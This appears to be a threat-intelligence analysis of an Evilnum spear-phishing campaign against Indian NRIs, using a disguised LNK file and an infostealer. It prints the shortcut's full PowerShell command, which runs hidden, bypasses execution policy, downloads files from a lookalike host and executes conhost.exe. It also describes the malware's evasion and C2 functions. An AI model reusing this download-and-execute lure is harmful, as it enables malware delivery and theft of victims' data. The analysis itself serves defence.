Evilnum group targets Indian NRIs with spear phishing emails claiming to be a document with Income tax rules, that delivers malicious infostealer malware. The main goal is to spy on HNIs, steal credentials, and access valuable financial information. The stolen information is usually sold in underground forums to other criminals.
The attack vector typically starts with a spear phishing email, with link to ZIP archive that contains maliciously crafted Windows shortcut file disguised as “Income tax new rules for NRI.pdf.lnk“.
Lnk File: Income tax new rules for NRI.pdf.lnk
Link Flags: HAS SHELLIDLIST | POINTS TO FILE/DIR | NO DESCRIPTION | HAS RELATIVE PATH STRING | HAS WORKING DIRECTORY | HAS CMD LINE ARGS | HAS CUSTOM ICON
File Attributes: ARCHIVE
Create Time: 2019-03-19 10:16:56.805162
Access Time: 2019-03-19 10:16:56.805162
Modified Time: 2019-03-19 10:pdf16:56.805162
Target length: 451584
Icon Index: 0
Target is on local volume
Volume Type: Fixed (Hard Disk)
Volume Serial: 26da47ae
Base Path: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
(App Path:) Remaining Path:
Relative Path: ..\..\..\..\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
Working Dir: %SystemRoot%\system32\
-w hidden -nop -ep bypass -c “IEX(New-Object System.Net.WebClient).DownloadFile(‘https://ccdn.microsoftdocs.workers.dev/_uploads/Income tax new rules for NRI.pdf’,’%userprofile%\Downloads\Income tax new rules for NRI.pdf’);(New-Object -com Shell.Application).ShellExecute(‘%userprofile%\Downloads\Income tax new rules for NRI.pdf’);IEX(New-Object System.Net.WebClient).DownloadFile(‘https://ccdn.microsoftdocs.workers.dev/_uploads/event.dat’,’C:\Users\Public\Music\event.log’);IEX(New-Object System.Net.WebClient).DownloadFile(‘https://ccdn.microsoftdocs.workers.dev/_uploads/conhost.dat’,’%temp%\conhost.exe’);(New-Object -com Shell.Application).ShellExecute(‘%temp%\conhost.exe’);”
Icon filename: .\pdf.pdf
The LNK file has Powershell script which downloads the malicious binary payload along with a PDF document to the victim’s machine.
The binary is downloaded as conhost.exe in %temp% directory. Downloaded binary file is signed with an invalid digital certificate.
Binary has a list of virtual environment MAC addresses and will not execute it’s payload, if a match is found. The executable code is protected and executes the malicious payload only after decrypting it. Upon execution, the malicious payload sends the following information to C2 server,
- Machine Name
- Antivirus Installed
- OS Name
- OS Version
- OS installation date
The malware is capable of performing following malevolent functionalities in response to the commands received from c2 server,
- Screen Capturing
- Downloading additional malwares
- Executing commands
In other incidents, Evilnum appears to use maliciously crafted windows shortcut file (LNK) disguised as scans of credit cards, ID cards, utility bills and other documents to lure the victims.